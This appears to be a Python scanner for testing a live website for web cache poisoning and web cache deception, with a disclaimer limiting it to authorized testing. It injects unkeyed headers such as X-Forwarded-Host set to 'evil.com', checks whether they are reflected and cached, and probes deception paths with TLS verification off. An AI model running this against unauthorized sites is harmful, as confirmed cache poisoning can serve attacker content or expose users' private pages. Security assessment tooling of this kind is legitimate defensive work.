#!/usr/bin/env python3 # For authorized penetration testing and educational environments only. # Usage against targets without prior mutual consent is illegal. # It is the end user's responsibility to obey all applicable local, state and federal laws. """Web cache poisoning assessment agent using requests and subprocess.""" import sys import json import time import random import string try: import requests from requests.exceptions import RequestException except ImportError: print("Install: pip install requests") sys.exit(1) def generate_cache_buster(): """Generate a unique cache buster parameter.""" return "cb" + "".join(random.choices(string.ascii_lowercase + string.digits, k=8)) def identify_cache_layer(target_url): """Identify caching infrastructure from response headers.""" try: resp = requests.get(target_url, timeout=10, verify=False) except RequestException as e: return {"error": str(e)} headers = dict(resp.headers) cache_info = { "url": target_url, "cache_control": headers.get("Cache-Control", ""), "x_cache": headers.get("X-Cache", ""), "cf_cache_status": headers.get("CF-Cache-Status", ""), "age": headers.get("Age", ""), "vary": headers.get("Vary", ""), "x_varnish": headers.get("X-Varnish", ""), "via": headers.get("Via", ""), "x_served_by": headers.get("X-Served-By", ""), "cdn_detected": None, } header_text = json.dumps(headers).lower() if "cloudflare" in header_text or cache_info["cf_cache_status"]: cache_info["cdn_detected"] = "Cloudflare" elif "varnish" in header_text: cache_info["cdn_detected"] = "Varnish" elif "akamai" in header_text: cache_info["cdn_detected"] = "Akamai" elif "fastly" in header_text: cache_info["cdn_detected"] = "Fastly" elif "x-amz" in header_text: cache_info["cdn_detected"] = "AWS CloudFront" return cache_info def test_cache_hit_miss(target_url): """Determine if responses are being cached by comparing repeated requests.""" cb = generate_cache_buster() test_url = f"{target_url}?{cb}=1" results = [] for i in range(3): try: resp = requests.get(test_url, timeout=10, verify=False) results.append({ "request": i + 1, "x_cache": resp.headers.get("X-Cache", ""), "cf_cache": resp.headers.get("CF-Cache-Status", ""), "age": resp.headers.get("Age", ""), "status": resp.status_code, }) except RequestException: pass time.sleep(1) return {"test_url": test_url, "results": results} def test_unkeyed_headers(target_url): """Test for unkeyed headers that are reflected in cached responses.""" cb = generate_cache_buster() base_url = f"{target_url}?{cb}=1" unkeyed_headers = [ ("X-Forwarded-Host", "evil.com"), ("X-Forwarded-Scheme", "http"), ("X-Forwarded-Proto", "http"), ("X-Original-URL", "/admin"), ("X-Rewrite-URL", "/admin"), ("X-Host", "evil.com"), ("X-Forwarded-Server", "evil.com"), ("X-Forwarded-Port", "1337"), ("X-Original-Host", "evil.com"), ("Transfer-Encoding", "chunked"), ] findings = [] for header_name, header_value in unkeyed_headers: cb = generate_cache_buster() test_url = f"{target_url}?{cb}=1" try: resp = requests.get( test_url, headers={header_name: header_value}, timeout=10, verify=False ) if header_value in resp.text: poisoned_resp = requests.get(test_url, timeout=10, verify=False) cached_poison = header_value in poisoned_resp.text findings.append({ "header": header_name, "value": header_value, "reflected": True, "cached_poison": cached_poison, "risk": "CRITICAL" if cached_poison else "HIGH", }) except RequestException: pass return findings def test_cache_key_normalization(target_url): """Test cache key normalization issues.""" cb = generate_cache_buster() tests = [] variations = [ (f"{target_url}?{cb}=1", "Original"), (f"{target_url}?{cb}=1&utm_source=test", "Extra parameter"), (f"{target_url}?{cb}=1#fragment", "Fragment"), (f"{target_url}/?{cb}=1", "Trailing slash"), ] for url, desc in variations: try: resp = requests.get(url, timeout=10, verify=False) tests.append({ "variation": desc, "url": url, "status": resp.status_code, "x_cache": resp.headers.get("X-Cache", ""), "content_length": len(resp.content), }) except RequestException: pass return tests def test_cache_deception(target_url): """Test for web cache deception vulnerabilities.""" cb = generate_cache_buster() deception_paths = [ "/account/profile.css", "/api/user.js", "/settings.png", "/dashboard/nonexistent.css", ] findings = [] for path in deception_paths: test_url = f"{target_url.rstrip('/')}{path}?{cb}=1" try: resp = requests.get(test_url, timeout=10, verify=False) cache_status = resp.headers.get("X-Cache", resp.headers.get("CF-Cache-Status", "")) if "HIT" in cache_status.upper() or resp.headers.get("Age"): findings.append({ "path": path, "cached": True, "status": resp.status_code, "content_type": resp.headers.get("Content-Type", ""), "risk": "HIGH", }) except RequestException: pass return findings def run_assessment(target_url): """Full web cache poisoning assessment.""" report = { "target": target_url, "cache_layer": identify_cache_layer(target_url), "cache_behavior": test_cache_hit_miss(target_url), "unkeyed_headers": test_unkeyed_headers(target_url), "key_normalization": test_cache_key_normalization(target_url), "cache_deception": test_cache_deception(target_url), } critical_count = sum( 1 for f in report["unkeyed_headers"] if f.get("risk") == "CRITICAL" ) high_count = sum( 1 for f in report["unkeyed_headers"] if f.get("risk") == "HIGH" ) + len(report["cache_deception"]) report["summary"] = { "cdn": report["cache_layer"].get("cdn_detected", "Unknown"), "critical_findings": critical_count, "high_findings": high_count, "poisonable_headers": [f["header"] for f in report["unkeyed_headers"] if f.get("cached_poison")], } return report def print_report(report): print("Web Cache Poisoning Assessment") print("=" * 50) print(f"Target: {report['target']}") print(f"CDN: {report['summary']['cdn']}") print(f"Critical: {report['summary']['critical_findings']}") print(f"High: {report['summary']['high_findings']}") if report["summary"]["poisonable_headers"]: print(f"\nPoisonable Headers:") for h in report["summary"]["poisonable_headers"]: print(f" - {h}") print(f"\nUnkeyed Header Tests:") for f in report["unkeyed_headers"]: status = "POISON" if f.get("cached_poison") else ("REFLECTED" if f.get("reflected") else "SAFE") print(f" {f['header']}: {status} [{f.get('risk', 'N/A')}]") if report["cache_deception"]: print(f"\nCache Deception:") for f in report["cache_deception"]: print(f" {f['path']}: CACHED ({f['content_type']})") if __name__ == "__main__": target = sys.argv[1] if len(sys.argv) > 1 else "https://example.com" result = run_assessment(target) print_report(result)